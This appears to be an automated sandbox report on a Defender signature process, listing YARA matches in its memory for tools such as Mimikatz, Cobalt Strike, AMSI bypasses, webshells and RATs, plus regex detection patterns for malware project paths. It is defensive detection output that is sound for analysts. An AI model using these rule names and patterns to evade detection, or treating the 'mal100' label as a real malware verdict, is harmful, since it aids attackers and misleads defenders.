Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HackTool_Samples description = Hacktool, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Unidentified_Malware_Two date = 2017-02-10, author = US CERT, description = Unidentified Implant by APT29, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gh0st author = https://github.com/jackcr/
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gholeeV1 Description = Gholee first discovered variant , Reference = http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html, Date = 2014/08, Author = @GelosSnake
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: MW_gholee_v1 date = 2014-08, hash0 = 48573a150562c57742230583456b4c02, sample_filetype = dll, maltype = Remote Access Trojan, description = http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html, Author = @GelosSnake
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NetWiredRC_B date = 2014-12-23, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = NetWiredRC, version = 1.1
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Creates files inside the system directory
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0 Jump to behavior
PE file contains executable resources (Code or Archives)
Source: MpAsDesc.dll.mui18.41.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: MpAsDesc.dll.mui9.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.41.dr Static PE information: No import functions for PE file found
Source: mpasbase.vdm.35.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui20.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui6.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.41.dr Static PE information: No import functions for PE file found
Source: mpavbase.vdm.35.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.41.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.41.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.41.dr Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.34.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui2.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.41.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.41.dr Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.34.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.41.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.41.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.41.dr Static PE information: No import functions for PE file found
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe Process token adjusted: Security Jump to behavior
Source: mpasdlta.vdm.34.dr Static PE information: Section: .rsrc ZLIB complexity 0.998730014535
Source: mpavdlta.vdm.34.dr Static PE information: Section: .rsrc ZLIB complexity 0.997841282895
Source: classification engine Classification label: mal100.rans.spre.troj.adwa.spyw.expl.evad.mine.winEXE@18/238@3/3
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D01AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError, 42_2_00007FF650D01AE0
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: ,AD:\baixa\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: -(.+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: /*.+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Admin\Desktop\other_cr\R_PE\2201\_CLC.vbp
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: "\Mom\Knamemom.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: .+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: 0+.+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: MyMoney.vbp
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: .+:\\aw1\\Etmscztha.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: \pekalongan.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: vD:\virustrojan\harpotinfeksiexe\harpotinfeksiexe\SERVER.VBP
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: ,'Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: \\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: R\baixando5link\baixando5link\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: X\D@nBtR270414\version final\DanBtR270414.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: .+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\.+\\Nueva carpeta\\###################################################################################################################################.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: 2Daum Watch\HitControl.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: f\MurdeR\Escritorio\Desktop\cypter\stub\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: TOC:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: 0+.+:\\.*NOVO.+\\BLINDADO\\PluginBrada.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: .+:\\Intel\\Obfuscated Number-[0-9]{1,3}\\Obfuscated Nr-[0-9]{1,3}\\[a-zA-Z]{5,15}.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: @\Hugo Tools\DRONES\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: V\Stuffs\w32.AntiAnarchy.E@mm\Havoc.Worm.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: '".+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp Binary or memory string: E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: /*.+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: 0.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: @*\AY:\zeus\downloadersource\My_Crypter_vbcrypter\vbcrypter\newStubMy\myprog.vbp
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp Binary or memory string: Z*\AE:\Stuff\Lilith Premium\Start\Projekt1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: &!C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp Binary or memory string: C:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: 4/:\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: .VBProjects
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: phapoeskeezm.vbp
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: .+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp Binary or memory string: 72E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: @\Polifemo Ebrio Crypter\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: D:\\.{15}\\WEBPNT\\WebpNt\.vBp
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: 4Bomba logica\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: JEC:\\Documents and Settings\\VAIO\\Desktop\\2012\\Codec\\Graphics.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: OJ.+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\.*\\Desktop\\.*\\Lite-Stub\\Obfuscated .*\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: \IELOCK.VBP
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: MSVBVM60.DLLd \DBSpy\DBSpy.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: \CEF\VBBHO.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: .+:\\.*NOVO.+\\BLINDADO\\PluginBrada.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: .+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: GB.+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString]
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: '".+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: C:\Documents and Settings\Administrator\My Documents\winrar\server\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: (\server\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: \MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: 61.+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp Binary or memory string: C:\NuAT.vbp]
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: :\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: PAJ:\MASTER\bb_soft\bb_promo\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: bho\VBBHO.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: worm2007.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: .+\\Cryptosy\\Stub\\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: .+:\\SoUrCe.*!\\.*SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: AC:\Atari.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: .+\\(BotSupho Compiler|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: \REeB.vbp
